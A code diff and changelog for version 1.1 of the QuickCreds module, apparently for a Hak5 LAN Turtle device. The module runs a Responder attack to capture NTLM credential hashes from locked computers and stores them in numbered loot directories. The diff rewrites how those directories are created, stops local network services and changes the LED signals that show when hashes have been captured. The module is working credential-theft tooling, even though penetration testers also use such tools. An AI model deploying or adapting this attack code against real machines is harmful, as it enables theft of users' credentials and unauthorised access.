Version 1.1

Fixes new directory creation in /root/loot and changes LED blink behavior to now rapidly blink when running and light solid when NTLM hashes have been saved.

modules/QuickCreds

@@ -1,6 +1,6 @@
 #!/bin/bash /usr/lib/turtle/turtle_module
-VERSION="1.0"
+VERSION="1.1"
-DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. Upon capture of NTLM hash the amber LED will repeat a 3 blink pattern. Author: Hak5Darren. Credit: Mubix."
+DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
 CONF=/tmp/QuickCreds.form
 
 : ${DIALOG_OK=0}
@@ -10,6 +10,11 @@ CONF=/tmp/QuickCreds.form
 : ${DIALOG_ITEM_HELP=4}
 : ${DIALOG_ESC=255}
 
+
+
+
+
+
 function configure {
 #  dialog --title "QuickCreds" --msgbox "\n\
 # Dependencies will be installed. An Internet connection is required.\n\
@@ -86,27 +91,31 @@ Configuration complete. Creds will be saved to /root/loot\n\
 Enable this module to have it start the attack on boot.\n" 9 72
 }
 
+
+
+
+
+
 function start {
+# Stop on-off-on DHCP blink pattern script
+echo "Stopping DHCP Detect Blink Script"
+/etc/init.d/dhcp_detect stop
+echo ""
 echo "QuickCreds started."
-echo "LED 3-blink pattern will repeat upon NTLM hash capture."
+echo "LED will blink rapidly while QuickCreds is running."
+echo "LED will light solid upon NTLM hash capture."
+echo ""
 echo "If starting this module from the Turtle Shell menu,"
 echo "press CTRL+C to return."
 
 echo "Starting attack..." >> /root/loot/responder.log
 
-# Remove logs symlink
+# Create new numbered loot directory and symlink it from Responder logs
-rm -rf /etc/turtle/Responder/logs
-
-# Enumerate loot directory
 cd /root/loot
-lastdir=$(ls -d [0-9][0-9][0-9][0-9] | tail -1)
+dircount=$(ls -lad /root/loot/* | wc -l)
-
+mkdir /root/loot/$((dircount))
-# Create new loot numbered directory
+rm /etc/turtle/Responder/logs
-newdir=$((++lastdir))
+ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
-mkdir /root/loot/$(printf "%04u" $newdir)
-
-# Create symlink
-ln -s /root/loot/$(printf "%04u" $newdir) /etc/turtle/Responder/logs
 
 # Stop dnsmasq
 /etc/init.d/dnsmasq stop 1&> /dev/null
@@ -121,30 +130,35 @@ if [ -e /etc/turtle/Responder/logs/*NTLM* ];
     if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
     then
       echo "Creds saved!" >> /root/loot/responder.log
+      finished
     fi
+fi
     echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.05
+    /usr/bin/sleep 0.04
     echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.05
+    /usr/bin/sleep 0.04
-    echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.05
-    echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.05
-    echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.05
-    echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
-    /usr/bin/sleep 0.6
-  fi
-sleep 1
 done
 }
 
+
+
+function finished {
+  echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
+  exit
+}
+
+
 function stop {
   kill $(ps | grep [R]esponder | awk {'print $1'})
   /etc/init.d/dnsmasq start 1&> /dev/null
   echo "QuickCreds Stopped"
 }
 
+
+
+
+
+
 function status {
   if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
 }